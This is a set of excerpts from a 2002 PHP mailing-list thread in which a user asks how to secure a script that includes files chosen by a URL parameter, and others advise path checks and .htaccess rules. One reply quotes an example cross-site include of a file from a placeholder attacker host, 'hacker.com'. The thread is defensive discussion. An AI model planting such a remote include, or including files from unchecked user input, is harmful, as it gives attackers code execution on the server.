RE: [PHP] Umm... Uh-oh

2002-10-04 Thread John W. Holmes
to include files based on something passed in the url. ---John Holmes... > -Original Message- > From: John Wards [mailto:[EMAIL PROTECTED]] > Sent: Friday, October 04, 2002 6:14 AM > To: Stas Maximov > Cc: PHP General > Subject: Re: [PHP] Umm... Uh-oh > > ah never

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread John Wards
, but NOT accessible via http. > > HTH, Stas > > - Original Message - > From: "John Wards" <[EMAIL PROTECTED]> > To: "PHP" <[EMAIL PROTECTED]> > Sent: Friday, October 04, 2002 10:58 AM > Subject: Re: [PHP] Umm... Uh-oh > > > erm..

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Stas Maximov
t; <[EMAIL PROTECTED]> To: "PHP" <[EMAIL PROTECTED]> Sent: Friday, October 04, 2002 10:58 AM Subject: Re: [PHP] Umm... Uh-oh erm..would that alow hackers access? Say I have a database include file would hackers be able to get access to my database like this? (include('http

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Marek Kilimajer
That would not help you if you include files based on unchecked user input. Justin French wrote: >all my include files are *.inc, and I have a .htaccess file that makes >apache refuse to serve those files directly thru http. > >Justin > > >on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrot

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread John Wards
so as my files are all .php I would be okay from an external hacking attempt? I don't have any worry about internal as I am on a dedicated server John On Friday 04 Oct 2002 11:02 am, Justin French wrote: > all my include files are *.inc, and I have a .htaccess file that makes > apache refuse to

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Justin French
all my include files are *.inc, and I have a .htaccess file that makes apache refuse to serve those files directly thru http. Justin on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote: > erm..would that alow hackers access? Say I have a database include file > would hackers be able

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread John Wards
erm..would that alow hackers access? Say I have a database include file would hackers be able to get access to my database like this? (include('http://mysite.com/datainc.php');) I hope bloody not!!! if so how on earth do i get round that! John On Friday 04 Oct 2002 10:52 am, Marek Kilimaj

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Marek Kilimajer
Use realpath() to check the path. I also suspect your script is vulnarable to cross-site includes (include('http://hacker.com/script.inc');) Rick Beckman wrote: >Okay, I was mistaken... There is a gaping security hole in my simple li'l >script... How do I modify it to only accept files from a

[PHP] Umm... Uh-oh

2002-10-04 Thread Rick Beckman
Okay, I was mistaken... There is a gaping security hole in my simple li'l script... How do I modify it to only accept files from a certain path? I want the url format to be script.php?call=1 where "1" is the called file in the /includes/ directory. Just when I get optimistic I leave the entire sys